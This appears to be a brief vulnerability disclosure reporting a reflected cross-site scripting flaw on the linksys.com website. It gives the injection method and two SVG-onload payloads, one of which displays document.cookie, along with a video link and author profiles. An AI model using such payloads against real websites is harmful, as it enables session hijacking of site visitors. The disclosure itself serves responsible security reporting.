Linksys.com suffers from a cross site scripting vulnerability.
277fce00d69a11ebe93c5dbe29b716a34e3d3c0b6bc82d5e1e02f2178b4090cb
# Exploit Title: [ Reflected XSS at Linksys ]
# Date: [ 02.06.2018 ]
# Exploit Author: [ Ismail Tasdelen ]
# Vendor Homepage: [ https://www.linksys.com/ ]
# Software Type : [ Website ]
# Software Version : [ N/A ]
# Vulenrability : [ Reflected Cross-site Scripting (XSS) ]
# Risk : [ Medium ]
# PoC :
Method : https://www.linksys.com/[country]/ + XSS Payload
XSS Payloads :
"><svg onload=alert('ismailtasdelen')>/
"><svg onload=alert(document.cookie)>/
Poc Video --> https://www.youtube.com/watch?v=CrRm7eSqSRI
# You want to follow my activity ?
https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://packetstormsecurity.com/user/ismailtasdelen